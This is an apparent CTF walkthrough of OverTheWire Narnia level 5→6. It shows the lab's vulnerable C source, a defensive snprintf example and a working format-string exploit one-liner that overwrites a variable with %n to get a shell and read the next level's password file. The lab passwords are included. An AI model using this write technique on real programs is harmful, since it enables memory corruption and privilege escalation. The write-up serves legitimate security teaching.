Part time CTF Player learn every day!!
🌠 I Love Hoshimachi Suisei!! 🌠

OverTheWire Narnia Level 5 → 6 tutorial!!

Login

Use the password from Level 4 → 5 (in my run it was faimahchiy):

ssh narnia5@narnia.labs.overthewire.org -p 2226
# password: faimahchiy

Task

Binary: /narnia/narnia5

The program passes user input straight to snprintf as the format string, with no fixed format of its own, which opens a format string vulnerability.

Goal: change the variable i from 1 to 500. The program even prints the address of i for us.


Source Code

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>   /* setreuid(), geteuid() */

int main(int argc, char **argv){
    int i = 1;          /* the target: must read 500 at the check below */
    char buffer[64];

    /* The bug: argv[1] is used as the format string itself, so any
       %-directives in the argument are interpreted by snprintf. */
    snprintf(buffer, sizeof buffer, argv[1]);
    buffer[sizeof(buffer) - 1] = 0;
    printf("Change i's value from 1 -> 500. ");

    if(i==500){
        printf("GOOD\n");
        setreuid(geteuid(), geteuid());   /* drop to the effective (narnia6) uid */
        system("/bin/sh");
    }

    /* Hint output: the buffer contents, their length, and the address of i. */
    printf("No way...let me give you a hint!\n");
    printf("buffer : [%s] (%d)\n", buffer, strlen(buffer));
    printf("i = %d (%p)\n", i, &i);
    return 0;
}

Key Observations

  • snprintf directly takes argv[1] as the format string.
  • With %n, snprintf stores the number of characters printed so far through the pointer it takes as the matching argument; if we control that argument, we control where the count is written.
  • Address of i is conveniently leaked.
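To make the defensive side concrete, here is an added example (my own code, not the level's source or anything from the original post) that puts the vulnerable call beside the one-argument fix, adds a simple input check for stray %-directives that a validator or log monitor could apply, and shows why the width trick used later in step 3 still reaches 500 even though only 63 bytes are stored: snprintf's character count, and therefore %n, keeps running past the buffer. The function names and the sample input are mine.

```c
#include <stdio.h>
#include <string.h>

/* Vulnerable pattern (what narnia5 does): user input becomes the format
   string, so any %-directives it contains are interpreted. Only ever call
   this with inert text; it is here to sit beside the fixed version. */
static int render_unsafe(char *out, size_t n, const char *user) {
    return snprintf(out, n, user);
}

/* Hardened form: a fixed, read-only format; user input is only an argument.
   Directives in `user` are copied literally and are never interpreted. */
static int render_safe(char *out, size_t n, const char *user) {
    return snprintf(out, n, "%s", user);
}

/* Returns 1 if render_safe() reproduces `s` byte for byte, directives intact. */
static int safe_preserves_literally(const char *s) {
    char out[64];
    render_safe(out, sizeof out, s);
    return strcmp(out, s) == 0;
}

/* Input check suitable for validation or logging: returns 1 if `s` holds a
   conversion directive ("%x", "%n", "%1$n", ...). A doubled "%%" is a literal
   percent sign and does not count. */
static int has_format_directive(const char *s) {
    for (size_t i = 0; s[i] != '\0'; i++) {
        if (s[i] != '%')
            continue;
        if (s[i + 1] == '%') {   /* "%%" -> literal '%' */
            i++;
            continue;
        }
        return 1;
    }
    return 0;
}

/* Why the width trick beats the 64-byte buffer: snprintf stops storing after
   n-1 bytes, but it keeps counting the characters it *would* have written,
   and %n stores that running count. The format here is a constant string and
   &count is a legitimate int*, so this use of %n is the intended, safe one. */
static int count_seen_by_n(void) {
    char buf[64];
    int count = -1;
    int ret = snprintf(buf, sizeof buf, "%496x%n", 1, &count);
    /* Return value and %n count both read 496 although only 63 chars fit
       in buf; four address bytes plus this width is the challenge's 500. */
    return (ret == count) ? count : -1;
}

int main(void) {
    char out[64];
    const char *hostile = "%x.%x.%x%n";   /* constructed sample input */

    render_safe(out, sizeof out, hostile);
    printf("safe copy : [%s]\n", out);   /* directives survive as plain text */
    printf("flagged   : %d\n", has_format_directive(hostile));
    printf("count seen by %%n past a 64-byte buffer: %d\n", count_seen_by_n());

    render_unsafe(out, sizeof out, "plain text only");   /* inert input */
    printf("unsafe, inert input: [%s]\n", out);
    return 0;
}
```

Compiling the same file with gcc's -Wformat-security flags the render_unsafe call ("format not a string literal and no format arguments"), which is the cheapest way to catch this class of bug across a code base before it ships.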

Exploitation Steps

1. Confirm vulnerability

./narnia5 %x.%x.%x
# Change i's value from 1 -> 500...
# buffer : [f7fc5000.30303035.333032e] (26)
# i = 1 (0xffffd6d0)

✅ Classic format string issue confirmed.


2. Locate our write

We want to write 500 into i (0xffffd6d0 in my run). The trick: put the address of i at the start of the input, then use %n so the running character count is written through it.

./narnia5 $(python3 -c 'import sys; sys.stdout.buffer.write(b"\xd0\xd6\xff\xff" + b"%1$n")')
# bytes, not str: print("\xd0\xd6\xff\xff") would UTF-8-encode each byte above 0x7f into two bytes and mangle the address
# segfaults (writes only 4, because just the four address bytes had been printed when %n ran)

So we need padding.


3. Use width specifier to reach 500

Instead of printing only the four address bytes, we pad the output with a width specifier so that 4 + 496 = 500 characters have been counted by the time %n fires. The 64-byte buffer truncates what gets stored, but snprintf's character count (and therefore the value %n writes) keeps running past the buffer, so i still receives 500.

./narnia5 $(python3 -c 'import sys; sys.stdout.buffer.write(b"\xd0\xd6\xff\xff" + b"%496x%1$n")')

4. Profit

Change i's value from 1 -> 500. GOOD
whoami
# narnia6
cat /etc/narnia_pass/narnia6
# <next password>

Password

From my run:

neezoceaeng

Quick One-liner

./narnia5 $(python3 -c 'import sys; sys.stdout.buffer.write(b"\xd0\xd6\xff\xff" + b"%496x%1$n")')

Troubleshooting

  • Wrong address? The leaked address of i may differ from run to run. Always use the address the program itself prints (i = 1 (0x…)).
  • Segmentation fault immediately? Make sure the address is injected in little-endian byte order (least significant byte first).
  • Not getting 500? Adjust the padding: the width is the target value minus the 4 address bytes already printed, i.e. %<value-4>x%1$n.

Congrats 🎉 You just exploited a format string vulnerability to overwrite memory. Onward to Level 6 → 7!


Thanks for reading!

Until next time — Otsumachi!! 💖☄️✨
